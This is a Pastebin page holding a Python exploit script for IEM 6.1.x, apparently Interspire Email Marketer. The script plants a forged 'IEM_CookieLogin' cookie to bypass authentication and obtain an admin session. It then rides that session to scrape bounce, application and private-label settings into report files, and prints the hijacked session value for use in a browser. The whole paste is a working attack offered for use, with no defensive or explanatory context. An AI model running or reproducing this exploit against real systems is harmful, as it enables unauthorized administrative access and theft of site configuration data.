G2A Many GEOs
SHARE
TWEET

s

a guest Apr 9th, 2020 323 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Grab Cookies IEM 6.1.x
  2. # Example Usage: python file.py http://site.com/mail/admin/index.php
  3.  
  4. import requests
  5. import sys
  6. from bs4 import BeautifulSoup
  7. from pprint import pprint
  8.  
  9.  
  10. def cookie_cutter(url):
  11.     with requests.Session() as s:
  12.        s.get(url)
  13.        r = s.get(url)
  14.        response_regex = r.text
  15.        print("requesting initial Cookie\n")
  16.        print(str(r.headers)+"\n")
  17.        
  18.        for key,value in s.cookies.items():
  19.            if key and "IEMSESSIONID" in key:
  20.          
  21.               s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
  22.        print("Attempting To Posion 2nd request with Forged Cookie\n")
  23.        print("-" * 25)
  24.        r = s.get(url)
  25.        response_regex2 = r.text
  26.        print response_regex2
  27.        print(str(r.headers) + "\n")
  28.        if response_regex != response_regex2:
  29.  
  30.           for key,value in s.cookies.items():
  31.               if "IEMSESSIONID" in key:
  32.                  try:
  33.                     #
  34.                     bounce_info_grab(url,value)
  35.                     app_info_grab(url,value)
  36.                     privt_info_grab(url,value)
  37.                  except:
  38.                      pass
  39.                  return value,r.text
  40.  
  41.  
  42. def bounce_info_grab(url,session_to_ride):
  43.     url_grab = url+"?Page=Settings&Tab=2"
  44.     print(url_grab)
  45.     with requests.Session() as s:
  46.        s.get(url_grab)
  47.        s.cookies.set('IEMSESSIONID',session_to_ride)
  48.        r = s.get(url_grab)
  49.        response_regex = r.text
  50.        soup = BeautifulSoup(response_regex,'html5lib')
  51.        div = soup.find('div', id='div7')
  52.      
  53.        
  54.        outfile = open("bounce_report.html",'w')
  55.        dataout = """<html><head>Report</head><title>Report</title>
  56.                    <body>""" + str(div) +"""</body></html>"""
  57.        outfile.write(dataout)
  58.        outfile.close()
  59.        for divy in div.contents:
  60.            print(divy)
  61.          
  62. def app_info_grab(url,session_to_ride):
  63.     url_grab = url+"?Page=Settings&Tab=2"
  64.     print(url_grab)
  65.     with requests.Session() as s:
  66.        s.get(url_grab)
  67.        s.cookies.set('IEMSESSIONID',session_to_ride)
  68.        r = s.get(url_grab)
  69.        response_regex = r.text
  70.        soup = BeautifulSoup(response_regex,'html5lib')
  71.        div = soup.find('div', id='div1')
  72.    
  73.        
  74.        outfile = open("application_settings_report.html",'w')
  75.        dataout = """<html><head>Report</head><title>Report</title>
  76.                    <body>""" + str(div) +"""</body></html>"""
  77.        outfile.write(dataout)
  78.        outfile.close()
  79.        for divy in div.contents:
  80.            print(divy)  
  81.    
  82. def privt_info_grab(url,session_to_ride):
  83.     url_grab = url+"?Page=Settings&Tab=2"
  84.     print(url_grab)
  85.     with requests.Session() as s:
  86.        s.get(url_grab)
  87.        s.cookies.set('IEMSESSIONID',session_to_ride)
  88.        r = s.get(url_grab)
  89.        response_regex = r.text
  90.        soup = BeautifulSoup(response_regex,'html5lib')
  91.        div = soup.find('div', id='div8')
  92.      
  93.        
  94.        outfile = open("privtlbl_settings_report.html",'w')
  95.        dataout = """<html><head>Report</head><title>Report</title>
  96.                    <body>""" + str(div) +"""</body></html>"""
  97.        outfile.write(dataout)
  98.        outfile.close()
  99.        for divy in div.contents:
  100.            print(divy)  
  101.    
  102. def main():
  103.     url = sys.argv[1]
  104.     print  "Target: " +url+ """ """+"\n"
  105.     print "-" * 25
  106.     try:
  107.        session_rider_value,content = cookie_cutter(url)
  108.        print "\033[92m Session Has Been Generated"+"\n"
  109.        print "-" * 25
  110.        print "\033[92m Magic Cookie Generated! Modify Existing IEMSESSIONID Value In browser With Below Value"
  111.        print "-" * 25
  112.        print  session_rider_value+"\n"
  113.        print "-" * 25
  114.     except:
  115.        print "\033[91m Target Is Not Vulnerable"
  116.        pass
  117.    
  118. main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top